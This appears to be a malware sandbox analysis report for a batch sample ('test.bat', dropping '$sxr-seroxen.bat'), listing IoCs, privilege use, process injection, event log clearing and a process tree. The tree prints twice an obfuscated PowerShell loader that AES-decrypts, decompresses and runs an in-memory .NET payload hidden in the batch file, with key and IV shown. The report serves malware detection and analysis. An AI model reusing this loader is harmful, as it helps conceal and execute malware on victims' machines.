Set value (int)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi	DllHost.exe

Runs regedit.exe 1 IoCs

pid	Process
3384	regedit.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3328	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
336	test.bat.exe
336	test.bat.exe
336	test.bat.exe
336	test.bat.exe
3596	dllhost.exe
3596	dllhost.exe
3596	dllhost.exe
3596	dllhost.exe
3140	$sxr-seroxen.bat.exe
3140	$sxr-seroxen.bat.exe
3140	$sxr-seroxen.bat.exe
3140	$sxr-seroxen.bat.exe
3388	dllhost.exe
3388	dllhost.exe
3388	dllhost.exe
3388	dllhost.exe
3140	$sxr-seroxen.bat.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe
1720	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3328	Explorer.EXE
3384	regedit.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	336	test.bat.exe
Token: SeDebugPrivilege	336	test.bat.exe
Token: SeDebugPrivilege	3596	dllhost.exe
Token: SeDebugPrivilege	3140	$sxr-seroxen.bat.exe
Token: SeDebugPrivilege	3140	$sxr-seroxen.bat.exe
Token: SeDebugPrivilege	3388	dllhost.exe
Token: SeDebugPrivilege	3140	$sxr-seroxen.bat.exe
Token: SeDebugPrivilege	1720	dllhost.exe
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeAuditPrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeAuditPrivilege	2492	svchost.exe
Token: SeAuditPrivilege	2492	svchost.exe
Token: SeAuditPrivilege	2492	svchost.exe
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE
Token: SeShutdownPrivilege	3328	Explorer.EXE
Token: SeCreatePagefilePrivilege	3328	Explorer.EXE

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe

Suspicious use of SendNotifyMessage 55 IoCs

pid	Process
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3704	chrome.exe
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
3140	$sxr-seroxen.bat.exe
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
3328	Explorer.EXE
5024	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3328	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1192 wrote to memory of 336	1192	cmd.exe	78
PID 1192 wrote to memory of 336	1192	cmd.exe	78
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 3596	336	test.bat.exe	80
PID 336 wrote to memory of 1384	336	test.bat.exe	81
PID 336 wrote to memory of 1384	336	test.bat.exe	81
PID 1384 wrote to memory of 3140	1384	cmd.exe	83
PID 1384 wrote to memory of 3140	1384	cmd.exe	83
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 3388	3140	$sxr-seroxen.bat.exe	84
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 3140 wrote to memory of 1720	3140	$sxr-seroxen.bat.exe	85
PID 1720 wrote to memory of 640	1720	dllhost.exe	5
PID 1720 wrote to memory of 700	1720	dllhost.exe	7
PID 1720 wrote to memory of 1008	1720	dllhost.exe	12
PID 1720 wrote to memory of 484	1720	dllhost.exe	13
PID 1720 wrote to memory of 880	1720	dllhost.exe	14
PID 1720 wrote to memory of 1064	1720	dllhost.exe	16
PID 1720 wrote to memory of 1144	1720	dllhost.exe	17
PID 1720 wrote to memory of 1168	1720	dllhost.exe	18
PID 1720 wrote to memory of 1208	1720	dllhost.exe	19
PID 1720 wrote to memory of 1216	1720	dllhost.exe	20
PID 1720 wrote to memory of 1288	1720	dllhost.exe	21
PID 1720 wrote to memory of 1308	1720	dllhost.exe	22
PID 1720 wrote to memory of 1332	1720	dllhost.exe	23

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:484
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c2d5dab9-c948-45f7-aea1-750cb710200e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3596
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f25cc94f-333a-4eca-96a1-772965785505}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2581304f-1de5-4a2e-9ccc-1c18b2818ff9}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1720

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Drops file in System32 directory
PID:700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2080

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2704

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3084

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1192
- - C:\Users\Admin\AppData\Local\Temp\test.bat.exe
    "test.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $FtZQH = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\test.bat').Split([Environment]::NewLine);foreach ($xmKPG in $FtZQH) { if ($xmKPG.StartsWith(':: ')) { $qlpXv = $xmKPG.Substring(3); break; }; };$CsYzi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qlpXv);$WnTOt = New-Object System.Security.Cryptography.AesManaged;$WnTOt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$WnTOt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$WnTOt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jm/zWcdAP2yFOo9YRnp6fCODfVseEY1ik7aooNZ0HOA=');$WnTOt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIA/Y6iPwDpv7eTUg6ksag==');$WPyEL = $WnTOt.CreateDecryptor();$CsYzi = $WPyEL.TransformFinalBlock($CsYzi, 0, $CsYzi.Length);$WPyEL.Dispose();$WnTOt.Dispose();$MPGtP = New-Object System.IO.MemoryStream(, $CsYzi);$wmJMu = New-Object System.IO.MemoryStream;$NbMhf = New-Object System.IO.Compression.GZipStream($MPGtP, [IO.Compression.CompressionMode]::Decompress);$NbMhf.CopyTo($wmJMu);$NbMhf.Dispose();$MPGtP.Dispose();$wmJMu.Dispose();$CsYzi = $wmJMu.ToArray();$pirKz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CsYzi);$URmKi = $pirKz.EntryPoint;$URmKi.Invoke($null, (, [string[]] ('')))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Deletes itself
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:336
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /C cd C:\Windows\ & $sxr-seroxen.bat
      4⤵
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:1384
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4948
    - - C:\Windows\$sxr-seroxen.bat.exe
        
        "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $FtZQH = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xmKPG in $FtZQH) { if ($xmKPG.StartsWith(':: ')) { $qlpXv = $xmKPG.Substring(3); break; }; };$CsYzi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qlpXv);$WnTOt = New-Object System.Security.Cryptography.AesManaged;$WnTOt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$WnTOt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$WnTOt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jm/zWcdAP2yFOo9YRnp6fCODfVseEY1ik7aooNZ0HOA=');$WnTOt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xIA/Y6iPwDpv7eTUg6ksag==');$WPyEL = $WnTOt.CreateDecryptor();$CsYzi = $WPyEL.TransformFinalBlock($CsYzi, 0, $CsYzi.Length);$WPyEL.Dispose();$WnTOt.Dispose();$MPGtP = New-Object System.IO.MemoryStream(, $CsYzi);$wmJMu = New-Object System.IO.MemoryStream;$NbMhf = New-Object System.IO.Compression.GZipStream($MPGtP, [IO.Compression.CompressionMode]::Decompress);$NbMhf.CopyTo($wmJMu);$NbMhf.Dispose();$MPGtP.Dispose();$wmJMu.Dispose();$CsYzi = $wmJMu.ToArray();$pirKz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CsYzi);$URmKi = $pirKz.EntryPoint;$URmKi.Invoke($null, (, [string[]] ('')))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3140
      - C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3140" "2612" "2516" "2608" "0" "0" "2616" "0" "0" "0" "0" "0"
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:5068
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2812
- - C:\Windows\regedit.exe
    regedit
    3⤵
    - Runs regedit.exe
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3384
- - C:\Windows\system32\reg.exe
    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    3⤵
    PID:4364
- - C:\Windows\system32\reg.exe
    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    3⤵
    PID:3820
- - C:\Windows\system32\reg.exe
    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    3⤵
    PID:2352
- - C:\Windows\system32\reg.exe
    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    3⤵
    PID:3460
- - C:\Windows\system32\reg.exe
    reg query HKEY_LOCAL_MACHINE\SOFTWARE
    3⤵
    PID:4436
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2720
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1016
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2720 -s 364
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      PID:2640
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3096
  - - C:\Windows\system32\reg.exe
      reg query HKEY_LOCAL_MACHINE\SOFTWARE
      4⤵
      PID:2220
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2020
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:848
  - - C:\Windows\system32\reg.exe
      reg query HKEY_LOCAL_MACHINE\SOFTWARE
      4⤵
      PID:3364
  - - C:\Windows\system32\cmd.exe
      cmd.exe
      4⤵
      PID:3424
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5024
    - - C:\Windows\system32\reg.exe
        
        reg query HKEY_LOCAL_MACHINE\SOFTWARE
        5⤵
        
        PID:1276
    - - C:\Windows\system32\cmd.exe
        
        cmd /c reg query HKEY_LOCAL_MACHINE\SOFTWARE
        5⤵
        
        PID:4020
      - C:\Windows\system32\reg.exe
        
        reg query HKEY_LOCAL_MACHINE\SOFTWARE
        6⤵
        
        PID:1464
    - - C:\Windows\system32\cmd.exe
        
        cmd /c reg query HKEY_LOCAL_MACHINE\SOFTWARE
        5⤵
        
        PID:336
      - C:\Windows\system32\reg.exe
        
        reg query HKEY_LOCAL_MACHINE\SOFTWARE
        6⤵
        
        PID:3500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3704
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x1a4,0x1a8,0x1ac,0x180,0x1b0,0x7ffdf786cc40,0x7ffdf786cc4c,0x7ffdf786cc58
    3⤵
    PID:3100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,18428698944286176840,1576225474496225454,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1804 /prefetch:2
    3⤵
    PID:3432
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2084,i,18428698944286176840,1576225474496225454,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2092 /prefetch:3
    3⤵
    PID:3356
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,18428698944286176840,1576225474496225454,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:8
    3⤵
    PID:2112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
